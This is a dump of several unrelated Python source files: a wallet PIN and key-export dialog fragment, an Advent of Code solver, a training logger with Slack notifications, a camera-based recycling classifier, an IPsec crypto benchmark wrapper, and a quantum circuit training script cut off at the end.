message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
aoc_day_18.py
|
from multiprocessing import Event, Pipe, Process, Queue, Value
from collections import defaultdict
from functools import wraps
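# Advent of Code day 18: each Registers instance interprets the same assembly-like
# program (snd/set/add/mul/mod/rcv/jgz). Two instances run in separate processes and
# exchange values through a pair of Queues; part 2 asks how many values program 1
# sends, which is what `counter` tracks.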
class Registers:
def __init__(self, program_id, queue_out, queue_in, event, instructions,
counter=None):
self.registers = defaultdict(int)
self.registers['p'] = int(program_id)
self.queue_out = queue_out
self.queue_in = queue_in
self.event = event
self.instructions = instructions
self.instruction_pointer = 0
self.counter = counter
def _sanitize_inputs(fn):
@wraps(fn)
def wrapper(self, *args):
def sanitize(val):
return val if val.isalpha() else int(val)
if len(args) == 1:
return fn(self, sanitize(args[0]))
else:
x = sanitize(args[0])
y = sanitize(args[1])
y = self.registers.get(y, y)
return fn(self, x, y)
return wrapper
def is_set(self):
return self.event.is_set()
@_sanitize_inputs
def send(self, x):
if self.counter:
self.counter.value += 1
self.queue_out.put(self.registers[x])
@_sanitize_inputs
def set_register(self, x, y):
self.registers[x] = y
@_sanitize_inputs
def add_to_register(self, x, y):
self.registers[x] += y
@_sanitize_inputs
def multiply_register(self, x, y):
self.registers[x] *= y
@_sanitize_inputs
def mod_register(self, x, y):
self.registers[x] %= y
def recover(self, x):
self.event.set()
while self.queue_in.empty():
pass
self.registers[x] = self.queue_in.get()
self.event.clear()
@_sanitize_inputs
def jump_size(self, x, y):
return y if self.registers.get(x, x) > 0 else 1
@property
def action_map(self):
return {
'snd': self.send,
'set': self.set_register,
'add': self.add_to_register,
'mul': self.multiply_register,
'mod': self.mod_register,
'rcv': self.recover,
'jgz': self.jump_size
}
def start(self):
while True:
action, params = self.instructions[self.instruction_pointer]
step = self.action_map[action](*params)
if step and isinstance(step, str):
print(action, params, step, self.registers.get('p'))
try:
self.instruction_pointer += step or 1
except:
print(action, type(self.instruction_pointer), type(step))
raise
def solution(instructions):
def run(register):
register.start()
a, b = Queue(), Queue()
counter = Value('i')
register_0 = Registers(0, a, b, Event(), instructions)
register_1 = Registers(1, b, a, Event(), instructions, counter=counter)
proc_1 = Process(target=run, args=(register_0,))
proc_1.daemon = True
proc_1.start()
proc2 = Process(target=run, args=(register_1,))
proc2.daemon = True
proc2.start()
while (not (register_0.is_set() and register_1.is_set())
or (a.qsize() or b.qsize())):
pass
return counter.value
if __name__ == '__main__':
with open('aoc_day_18_input.txt', 'r') as f:
instructions = [(line.split()[0], line.split()[1:])
for line in f.readlines()]
print(f'Part 2: {solution(instructions)}')
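# Expected input format (illustrative): one instruction per line, e.g.
#   snd a
#   set a 1
#   jgz a -1
# Each line is split into (opcode, operand list) before being dispatched above.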
|
infolog.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from npu_bridge.npu_init import *
import atexit
import json
from datetime import datetime
from threading import Thread
from urllib.request import Request, urlopen
_format = "%Y-%m-%d %H:%M:%S.%f"
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
    _file = open(filename, "a")
_file.write("\n-----------------------------------------------------------------\n")
_file.write("Starting new {} training run\n".format(run_name))
_file.write("-----------------------------------------------------------------\n")
_run_name = run_name
_slack_url = slack_url
def log(msg, end="\n", slack=False):
#print(msg, end=end)
if _file is not None:
_file.write("[%s] %s\n" % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header("Content-Type", "application/json")
urlopen(req, json.dumps({
"username": "tacotron",
"icon_emoji": ":taco:",
"text": "*%s*: %s" % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
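# Example usage (illustrative sketch; paths and names are placeholders):
#   init("logs/train.log", run_name="tacotron-demo", slack_url=None)
#   log("step 100: loss=0.42")            # appended to the log file with a timestamp
#   log("training finished", slack=True)  # also posted to Slack if a URL was given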
|
detection.py
|
from imutils.video import VideoStream
from multiprocessing import Process
from multiprocessing import Queue
import numpy as np
import imutils
import time
import cv2
from led import turn_on, turn_off
import datetime as dt
START_TIME = dt.datetime.now()
# load the class labels from disk
rows = open("synset_words.txt").read().strip().split("\n")
CLASSES = [r[r.find(" ") + 1:].split(",")[0] for r in rows]
COLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))
CONFIDENCE = 0.7
# Categories of paper, plastic, and other
CATEGORIES = {
"water bottle": "plastic",
"water jug": "plastic",
"plastic bag": "plastic",
"envelope": "paper",
"notebook": "paper",
"book jacket": "paper",
"toilet tissue": "paper",
"packet": "plastic",
"mouse": "trash",
"beaker": "plastic",
"tvmonitor": "trash",
"cellular telephone": "trash",
"cellular phone": "trash",
"cellphone": "trash",
"mobile phone": "trash",
}
# Passes the input frame and extracts detections
def get_detections(network, inputQ, outputQ):
while True:
if not inputQ.empty():
frame = inputQ.get()
frame = cv2.resize(frame, (224, 224))
blob = cv2.dnn.blobFromImage(frame, 1, (224, 224), (104, 117, 123))
# input blob to neural net
network.setInput(blob)
detections = network.forward()
# set as new output
outputQ.put(detections)
# Start a process which continuously runs get_detections
def start_background_detections(network, inputQ, outputQ):
p = Process(target=get_detections, args=(network, inputQ, outputQ,))
p.daemon = True
p.start()
# def get_led_states(plastic_state, other_state):
# while True:
# if plastic_state:
# turn_on("plastic")
# plastic_state = 0
# elif other_state:
# turn_on("other")
# other_state = 0
#
#
# # Start a process which continuously runs get_detections
# def start_background_leds(plastic_state, other_state):
# p = Process(target=get_led_states, args=(plastic_state, other_state))
# p.daemon = False
# p.start()
# Start the Picamera video stream
def start_video_stream():
vs = VideoStream(usePiCamera=True).start()
time.sleep(2.0)
return vs
# reads the width and height values of the box from the frame
def read_frame(vs):
frame = vs.read()
frame = imutils.resize(frame, width=400)
(frHeight, frWidth) = frame.shape[:2]
return frame, frHeight, frWidth
# Modifies input and output Queues
def check_queues(frame, detections, inputQ, outputQ):
if inputQ.empty():
inputQ.put(frame)
if not outputQ.empty():
detections = outputQ.get()
return detections, inputQ, outputQ
# Light the LED for the detected item's category (currently unused; the call in
# check_detections below is commented out).
def ledCheck(itemstr):
    if itemstr in CATEGORIES:
        turn_on(CATEGORIES[itemstr])
    else:
        # fall back to the generic "other" LED, as in the commented-out helper above
        turn_on("other")
# check to see if there are detections in the frame
def check_detections(frame, detections, frHeight, frWidth):
# Gets highest confidence level detection and displays it on the frame
    # top-5 class indices, highest confidence first
    top_idxs = np.argsort(detections[0])[::-1][:5]
    turn_off()
    for (i, idx) in enumerate(top_idxs):
itemstr = CLASSES[idx]
#ledCheck(itemstr)
if (detections[0][idx] > 0.150101):
if itemstr in CATEGORIES:
turn_on(CATEGORIES[itemstr])
text = "Label: {}, {:.2f}%".format(itemstr,
detections[0][idx] * 100)
cv2.putText(frame, text, (5, 25), cv2.FONT_HERSHEY_SIMPLEX,
0.7, (0, 0, 255), 2)
break
#print("[INFO] {}. label: {}, probability: {:.5}".format(i+1, CLASSES[idx], detections[0][idx]),)
return idx, itemstr
# Extract the index of the class label from the detections and compute x, y
# co-ordinates
def extract_classes(detections, i, frWidth, frHeight):
idx = int(detections[0, 0, i, 1])
dims = np.array([frWidth, frHeight, frWidth, frHeight])
box = detections[0, 0, i, 3:7] * dims
(startX, startY, endX, endY) = box.astype("int")
return idx, startX, startY, endX, endY
# Draw the prediction box on the frame
def draw_frames(idx, frame, startX, startY, endX, endY):
label = "{}: {:.2f}%".format(CLASSES[idx],
CONFIDENCE * 100)
cv2.rectangle(frame, (startX, startY), (endX, endY),
COLORS[idx], 2)
y = startY - 15 if startY - 15 > 15 else startY + 15
cv2.putText(frame, label, (startX, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)
def determine_category():
pass
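# --- Illustrative main loop (sketch, not part of the original script) ---
# Assumptions: a GoogLeNet Caffe model is available locally; the file names
# "bvlc_googlenet.prototxt" and "bvlc_googlenet.caffemodel" are placeholders.
if __name__ == "__main__":
    net = cv2.dnn.readNetFromCaffe("bvlc_googlenet.prototxt", "bvlc_googlenet.caffemodel")
    inputQ = Queue(maxsize=1)
    outputQ = Queue(maxsize=1)
    detections = None
    start_background_detections(net, inputQ, outputQ)
    vs = start_video_stream()
    while True:
        frame, frHeight, frWidth = read_frame(vs)
        # feed the newest frame to the worker and fetch the latest detections
        detections, inputQ, outputQ = check_queues(frame, detections, inputQ, outputQ)
        if detections is not None:
            check_detections(frame, detections, frHeight, frWidth)
        cv2.imshow("Frame", frame)
        if cv2.waitKey(1) & 0xFF == ord("q"):
            break
    cv2.destroyAllWindows()
    vs.stop()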
|
ipsec_perf_tool.py
|
#!/usr/bin/env python3
"""
**********************************************************************
Copyright(c) 2021, Intel Corporation All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name of Intel Corporation nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**********************************************************************
"""
import threading
import queue
import os
import sys
import subprocess
import platform
import time
import argparse
import textwrap
# number of variants to run
TOTAL_VARIANTS = 0
# dictionary to store env vars
ENVS = None
# queues to store todo and completed variants
TODO_Q = None
DONE_Q = None
# don't output info to stderr if set
QUIET = False
# perf application name
PERF_APP = ''
# exit on error flag
EXIT_ERROR = False
class Variant:
"""Class to setup and run test case variant"""
def __init__(self, idx=None, arch=None, direction='encrypt', cipher_alg=None,
hash_alg=None, aead_alg=None, sizes=None, offset=None,
cold_cache=False, shani_off=False, gcm_job_api=False,
unhalted_cycles=False, quick_test=False, smoke_test=False,
imix=None, aad_size=None, job_iter=None):
"""Build perf app command line"""
global PERF_APP
self.idx = idx
self.arch = arch
self.direction = direction
self.cipher_alg = cipher_alg
self.hash_alg = hash_alg
self.aead_alg = aead_alg
self.sizes = sizes
self.offset = offset
self.cmd = '{} --no-progress-bar '.format(PERF_APP)
self.cmd_output = ''
self.out = []
self.core = None
self.cold_cache = cold_cache
self.shani_off = shani_off
self.gcm_job_api = gcm_job_api
self.unhalted_cycles = unhalted_cycles
self.quick_test = quick_test
self.smoke_test = smoke_test
self.imix = imix
self.aad_size = aad_size
self.job_iter = job_iter
if self.arch is not None:
self.cmd += ' --arch {}'.format(self.arch)
if self.offset is not None:
self.cmd += ' -o {}'.format(self.offset)
if self.aead_alg is not None:
if self.cipher_alg is not None or \
self.hash_alg is not None:
print("Invalid combination: aead + cipher / hash", \
file=sys.stderr)
sys.exit(1)
self.cmd += ' --aead-algo {}'.format(self.aead_alg)
if self.cipher_alg is not None:
if self.aead_alg is not None:
print("Invalid combination: aead + cipher", file=sys.stderr)
sys.exit(1)
self.cmd += ' --cipher-algo {}'.format(self.cipher_alg)
if self.hash_alg is not None:
if self.aead_alg is not None:
print("Invalid combination: aead + hash", file=sys.stderr)
sys.exit(1)
self.cmd += ' --hash-algo {}'.format(self.hash_alg)
if self.cipher_alg is not None or \
self.aead_alg is not None:
self.cmd += ' --cipher-dir {}'.format(self.direction)
if self.sizes is not None:
self.cmd += ' --job-size {}'.format(self.sizes)
if self.cold_cache is True:
self.cmd += ' -c'
if self.shani_off is True:
self.cmd += ' --shani-off'
if self.gcm_job_api is True:
self.cmd += ' --gcm-job-api'
if self.unhalted_cycles is True:
self.cmd += ' --unhalted-cycles'
if self.quick_test is True:
self.cmd += ' --quick'
if self.smoke_test is True:
self.cmd += ' --smoke'
if self.imix is not None:
self.cmd += ' --imix {}'.format(self.imix)
if self.aad_size is not None:
self.cmd += ' --aad-size {}'.format(self.aad_size)
if self.job_iter is not None:
self.cmd += ' --job-iter {}'.format(self.job_iter)
def run(self):
"""Run perf app and store output"""
try:
self.cmd_output = \
subprocess.run(self.cmd, \
stdout=subprocess.PIPE, \
stderr=subprocess.PIPE, \
shell=True, env=ENVS, \
check=True).stdout.decode('utf-8')
return True
except subprocess.CalledProcessError as e:
self.cmd_output = e.stderr.decode('utf-8')
return False
def set_core(self, core):
"""Set core to run perf app on"""
self.core = core
mask = 1 << core
self.cmd += ' --cores {}'.format(str(hex(mask)))
def get_output(self):
"""Get output from run"""
return self.cmd_output
def get_cmd(self):
"""Get variant command line"""
return self.cmd
def get_idx(self):
"""Get assigned index"""
return self.idx
def get_info(self):
"""Get variant details"""
if self.idx is None:
idx = ''
else:
idx = self.idx
if self.cipher_alg is None:
cipher_alg = ''
else:
cipher_alg = self.cipher_alg
if self.hash_alg is None:
hash_alg = ''
elif cipher_alg == '':
hash_alg = self.hash_alg
else:
hash_alg = ' + ' + self.hash_alg
if self.aead_alg is None:
aead_alg = ''
else:
aead_alg = self.aead_alg
if self.core is None:
core = ''
else:
core = self.core
if self.direction is None:
direction = 'n/a'
else:
direction = self.direction
alg = '{}{}{}'.format(cipher_alg, hash_alg, aead_alg)
info = '{0:<5} {1:<4} {2:<6} {3:<7} {4:<40}'\
.format(idx, core, self.arch, direction, alg)
return info
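# Example (illustrative): Variant(arch='AVX2', direction='encrypt',
# cipher_alg='aes-cbc-128', offset=24) pinned to core 2 builds a command roughly like
#   ipsec_perf --no-progress-bar --arch AVX2 -o 24 --cipher-algo aes-cbc-128 \
#              --cipher-dir encrypt --cores 0x4
# The exact algorithm names come from `ipsec_perf --print-info` (see get_info() below).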
def init_global_vars():
"""Initialize global variables"""
global TOTAL_VARIANTS
global ENVS
global TODO_Q
global DONE_Q
global QUIET
global PERF_APP
# init vars
TOTAL_VARIANTS = 0
QUIET = False
# include perf directory in PATH
path = '{}:{}'.format(os.getenv('PATH'), os.getenv('PWD'))
# set LD_LIBRARY_PATH if not already set
lib_path = os.getenv('LD_LIBRARY_PATH')
if lib_path is None:
lib_path = '../lib'
# create env vars dictionary to pass to subprocess module
ENVS = {'PATH' : path, 'LD_LIBRARY_PATH' : lib_path}
# init queues to store todo and completed variants
TODO_Q = queue.Queue()
DONE_Q = queue.Queue()
# detect OS and select app name
if platform.system() == 'Windows':
PERF_APP = 'ipsec_perf.exe'
else:
PERF_APP = 'ipsec_perf'
def get_info():
"""get system and app info from perf app output"""
global PERF_APP
archs = None
best_arch = None
cipher_algos = None
hash_algos = None
aead_algos = None
cmd = PERF_APP + ' --print-info'
try:
res = subprocess.run(cmd, stdout=subprocess.PIPE, \
stderr=subprocess.STDOUT, \
env=ENVS, shell=True, check=True)
output = res.stdout.decode('utf-8')
except subprocess.CalledProcessError as e:
print("Error (" + str(e.returncode) + ")")
print(e.output.decode('utf-8'))
sys.exit(1)
lines = output.rstrip().split('\n')
try:
for line in lines:
info = line.split(':')
if info[0] == 'Supported architectures':
archs = info[1].split()
if info[0] == 'Best architecture':
best_arch = info[1].split()
if info[0] == 'Supported cipher algorithms':
cipher_algos = info[1].split()
if info[0] == 'Supported hash algorithms':
hash_algos = info[1].split()
if info[0] == 'Supported aead algorithms':
aead_algos = info[1].split()
except:
print("Error parsing --print-info output:\n" \
"{}".format(output), file=sys.stderr)
if archs is None or best_arch is None or cipher_algos is None \
or hash_algos is None or aead_algos is None:
print("Error parsing system and app information", file=sys.stderr)
sys.exit(1)
return archs, best_arch, cipher_algos, hash_algos, aead_algos
def parse_cores(core_str):
"""Parse core list passed through command line"""
num_cores = os.cpu_count()
cores = []
# remove spaces
    core_str = core_str.replace(" ", "")
# check if not a range
if '-' not in core_str:
cores = list(map(int, core_str.strip().split(',')))
else:
# parse range e.g. 2-8
core_str = core_str.strip().split('-')
for i in range(int(core_str[0]), int(core_str[1]) + 1):
cores.append(i)
# ensure valid cores specified
for core in cores:
if core < 0 or core >= num_cores:
print("Core {} out of range!".format(core), file=sys.stderr)
raise Exception()
return cores
def parse_results(variants):
"""Parse output of perf app for variant"""
out = []
# set header
lines = variants[0].get_output().split('\n')
for line in lines[:-1]:
out.append(line.split('\t')[0])
# append output for all variants to single list
for var in variants:
lines = var.get_output().split('\n')
for i in range(0, len(lines) - 1):
out[i] += '\t{}'.format(lines[i].split()[1])
return out
def parse_args():
"""Parse command line arguments"""
global QUIET
cores = None
directions = ['encrypt', 'decrypt']
offset = 24
alg_types = ['cipher-only', 'hash-only', 'aead-only', 'cipher-hash-all']
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,
description="Wrapper script for the ipsec-mb " \
"performance application enabling extended functionality")
# parse and validate args
parser.add_argument("-a", "--arch", choices=['SSE', 'AVX', 'AVX2', 'AVX512'],
default=None, action='append',
help="set architecture to test (default tests all supported archs)")
parser.add_argument("-c", "--cores", default=cores,
help="list/range of cores e.g. 2-8 or 3,4,5")
parser.add_argument("-d", "--direction", default=None,
choices=directions, help="Cipher direction")
parser.add_argument("-o", "--offset", default=offset, type=int,
help="offset for the SHA size increment, default is 24")
parser.add_argument("-t", "--alg-type", default=None, action='append', choices=alg_types,
help="algorithm types to test")
parser.add_argument("-s", "--job-size", default=None,
help=textwrap.dedent('''\
size of the cipher & hash job in bytes.
It can be:
- single value: test single size
- list: test multiple sizes separated by commas
- range: test multiple sizes with following format
min:step:max (e.g. 16:16:256)\n'''))
parser.add_argument("-q", "--quiet", default=False, action='store_true',
help="disable verbose output")
parser.add_argument("--cold-cache", default=False, action='store_true',
help="use cold cache, it uses warm as default")
parser.add_argument("--arch-best", action='store_true',
help="detect available architectures and run only on the best one")
parser.add_argument("--shani-off", action='store_true', help="don't use SHA extensions")
parser.add_argument("--gcm-job-api", action='store_true',
help="use JOB API for GCM perf tests (raw GCM API is default)")
parser.add_argument("--unhalted-cycles", action='store_true',
help=textwrap.dedent('''\
measure using unhalted cycles (requires root).
Note: RDTSC is used by default'''))
parser.add_argument("--quick", action='store_true',
help=textwrap.dedent('''\
reduces number of test iterations by x10
(less precise but quicker)'''))
parser.add_argument("--smoke", action='store_true',
help=textwrap.dedent('''\
very quick, imprecise and without print out
(for validation only)'''))
parser.add_argument("--imix", default=None,
help=textwrap.dedent('''\
set numbers that establish occurrence proportions between packet sizes.
It requires a list of sizes through --job-size.
(e.g. --imix 4,6 --job-size 64,128 will generate
a series of job sizes where on average 4 out of 10
packets will be 64B long and 6 out of 10 packets
will be 128B long)'''))
parser.add_argument("--aad-size", default=None, type=int,
help="size of AAD for AEAD algorithms")
parser.add_argument("--job-iter", default=None, type=int,
help="number of tests iterations for each job size")
args = parser.parse_args()
# validate and convert values where necessary
if args.arch is not None and args.arch_best is True:
print("{}: error: argument -a/--arch cannot be used with " \
"--arch-best".format(sys.argv[0]), file=sys.stderr)
sys.exit(1)
if args.cores is not None:
try:
cores = parse_cores(args.cores)
except:
print("{}: error: argument -c/--cores: invalid value " \
"{}".format(sys.argv[0], args.cores), file=sys.stderr)
sys.exit(1)
if args.imix is not None and args.job_size is None:
print("{}: error: argument --imix must be used with " \
"--job-size".format(sys.argv[0]), file=sys.stderr)
sys.exit(1)
if args.alg_type is not None:
alg_types = args.alg_type
else:
# strip all cipher hash combinations in default run
alg_types = alg_types[:-1]
if args.direction is not None:
directions = [args.direction]
if args.quiet is True:
QUIET = True
return args.arch, cores, directions, args.offset, \
alg_types, args.job_size, args.cold_cache, args.arch_best, \
args.shani_off, args.gcm_job_api, args.unhalted_cycles, \
args.quick, args.smoke, args.imix, \
args.aad_size, args.job_iter
def run_test(core=None):
"""
Main processing thread function
1. Dequeue variants from todo queue until empty
2. Run performance test for variant
3. Place completed variants in completed (done) queue
"""
global QUIET
global TODO_Q
global DONE_Q
global EXIT_ERROR
while TODO_Q.empty() is False:
variant = TODO_Q.get()
# skip if error encountered
if EXIT_ERROR is True:
if QUIET is False:
print('{} {}'.format(variant.get_info(), '...skipped'), file=sys.stderr)
TODO_Q.task_done()
continue
# set core if specified
if core is not None:
variant.set_core(core)
# print variant information
if QUIET is False:
print(variant.get_info(), file=sys.stderr)
# run variant
if variant.run() is False:
print('Error encountered running: {}\nOutput:\n{}'\
.format(variant.get_cmd(),
variant.get_output()),
file=sys.stderr)
EXIT_ERROR = True
DONE_Q.put(variant)
TODO_Q.task_done()
def main():
"""
Main function to:
- parse command line args
- generate and enqueue list of variants to run
- schedule variants across selected cores
- post process results and print to stdout
"""
global TOTAL_VARIANTS
global QUIET
global TODO_Q
global DONE_Q
global EXIT_ERROR
header = '\n{0:<5} {1:<4} {2:<6} {3:<7} {4:<40}'\
.format('NO', 'CORE', 'ARCH', 'DIR', 'ALG')
result = [] # list to store parsed results
# init global vars
init_global_vars()
supported_archs, best_arch, cipher_algos, hash_algos, aead_algos = get_info()
# parse command line args
archs, cores, directions, offset, alg_types, sizes, cold_cache, arch_best, \
shani_off, gcm_job_api, unhalted_cycles, quick_test, smoke_test, \
imix, aad_size, job_iter = parse_args()
# validate requested archs are supported
if arch_best is True:
archs = best_arch
elif archs is None:
archs = supported_archs
else:
for arch in archs:
if arch not in supported_archs:
print('Error: {} arch not supported!'.format(arch), file=sys.stderr)
sys.exit(1)
# print args
if QUIET is False:
print('Testing:', file=sys.stderr)
print(' Architectures: {}'.format(archs), file=sys.stderr)
print(' Algorithms: {}'.format(alg_types), file=sys.stderr)
print(' Directions: {}'.format(directions), file=sys.stderr)
if offset is not None:
print(' Offset: {}'.format(offset), file=sys.stderr)
if aad_size is not None:
print(' AAD size: {}'.format(aad_size), file=sys.stderr)
if sizes is not None:
print(' Sizes: {}'.format(sizes), file=sys.stderr)
if imix is not None:
print(' IMIX: {}'.format(imix), file=sys.stderr)
if cores is not None:
print(' Cores: {}'.format(cores), file=sys.stderr)
print(' Cache: {}'.format("cold" if cold_cache else "warm"), file=sys.stderr)
print(' SHANI: {}'.format("off" if shani_off else "on"), file=sys.stderr)
print(' GCM API: {}'.format("job" if gcm_job_api else "direct"), file=sys.stderr)
print(' Measuring using {}'.format("unhalted cycles" if unhalted_cycles \
else "rdtsc"), file=sys.stderr)
if quick_test is True or smoke_test is True:
print(' Test type: {}'.format("smoke" if smoke_test else "quick"), file=sys.stderr)
if job_iter is not None:
print(' Job iterations: {}'.format(job_iter), file=sys.stderr)
print(header, file=sys.stderr)
# fill todo queue with variants to test
for arch in archs:
if 'cipher-only' in alg_types:
for direction in directions:
for cipher_alg in cipher_algos:
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
offset=offset, sizes=sizes, cipher_alg=cipher_alg,
cold_cache=cold_cache, shani_off=shani_off,
gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
quick_test=quick_test, smoke_test=smoke_test, imix=imix,
aad_size=aad_size, job_iter=job_iter))
TOTAL_VARIANTS += 1
if 'hash-only' in alg_types:
# skip direction for hash only algs
for hash_alg in hash_algos:
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=None,
offset=offset, sizes=sizes, hash_alg=hash_alg,
cold_cache=cold_cache, shani_off=shani_off,
gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
quick_test=quick_test, smoke_test=smoke_test, imix=imix,
aad_size=aad_size, job_iter=job_iter))
TOTAL_VARIANTS += 1
if 'aead-only' in alg_types:
for direction in directions:
for aead_alg in aead_algos:
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
offset=offset, sizes=sizes, aead_alg=aead_alg,
cold_cache=cold_cache, shani_off=shani_off,
gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
quick_test=quick_test, smoke_test=smoke_test, imix=imix,
aad_size=aad_size, job_iter=job_iter))
TOTAL_VARIANTS += 1
if 'cipher-hash-all' in alg_types:
for direction in directions:
# all cipher + hash combinations
for cipher_alg in cipher_algos:
for hash_alg in hash_algos:
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
offset=offset, sizes=sizes, cipher_alg=cipher_alg,
hash_alg=hash_alg, cold_cache=cold_cache,
shani_off=shani_off, gcm_job_api=gcm_job_api,
unhalted_cycles=unhalted_cycles, quick_test=quick_test,
smoke_test=smoke_test, imix=imix, aad_size=aad_size,
job_iter=job_iter))
TOTAL_VARIANTS += 1
# take starting timestamp
start_ts = time.time()
# If cores selected start a new thread on each core
# otherwise start single thread without specifying a core
#
# Each thread takes a variant from the todo queue
# and places it in the done queue when complete
if cores is None:
threading.Thread(target=run_test).start()
else:
for core in cores:
threading.Thread(target=run_test, args=(core,)).start()
# wait for all threads to complete
TODO_Q.join()
# take end timestamp
end_ts = time.time()
# exit if error encountered
if EXIT_ERROR is True:
print('Error encountered while running tests!', file=sys.stderr)
sys.exit(1)
# output time taken to complete
runtime = end_ts - start_ts
if QUIET is False:
print("Time to complete: {:.3f} seconds" \
.format(runtime), file=sys.stderr)
# transfer completed runs from the
# done queue to the results list
while DONE_Q.empty() is False:
variant = DONE_Q.get()
result.append(variant)
# sort by idx
result.sort(key=lambda x: x.get_idx())
# parse results and print to stdout
output = parse_results(result)
for line in output:
print(line)
if __name__ == "__main__":
main()
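# Example invocations (illustrative):
#   ./ipsec_perf_tool.py --arch-best -t cipher-only -s 64,1024,16384 -c 2-5
#   ./ipsec_perf_tool.py -a AVX512 -t aead-only -s 64,128 --imix 4,6 --quick
# Results are printed to stdout as tab-separated columns, one column per variant.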
|
compare_num_layer_haar_multiprocessing_sgd.py
|
import qiskit
import numpy as np
import sys
import multiprocessing
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.nqubit, qtm.fubini_study, qtm.encoding
def run_haar(num_layers, num_qubits):
psi = 2*np.random.rand(2**num_qubits)-1
# Haar
thetas = np.ones(num_qubits*num_layers*5)
psi = psi / np.linalg.norm(psi)
encoder = qtm.encoding.Encoding(psi, 'amplitude_encoding')
loss_values_haar = []
thetass_haar = []
for i in range(0, 400):
if i % 20 == 0:
print('Haar (' + str(num_layers) + ' layer): ', i)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
# G = qtm.fubini_study.calculate_linear_state(qc.copy(), thetas, num_layers)
qc = encoder.qcircuit
grad_loss = qtm.base.grad_loss(
qc,
qtm.nqubit.create_haarchecker_linear,
thetas, num_layers = num_layers, encoder = encoder)
# grad1 = np.real(np.linalg.inv(G) @ grad_loss)
thetas -= qtm.constant.learning_rate*grad_loss
qc_copy = qtm.nqubit.create_haarchecker_linear(qc.copy(), thetas, num_layers, encoder)
loss = qtm.base.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values_haar.append(loss)
thetass_haar.append(thetas.copy())
traces_haar, fidelities_haar = [], []
for thetas in thetass_haar:
# Get |psi> = U_gen|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.nqubit.create_linear_state(qc, thetas, num_layers = num_layers)
psi , rho_psi = qtm.base.extract_state(qc)
# Get |psi~> = U_target|000...>
qc1 = encoder.qcircuit
psi_hat , rho_psi_hat = qtm.base.extract_state(qc1)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces_haar.append(trace)
fidelities_haar.append(fidelity)
    print('Writing ... ' + str(num_layers))
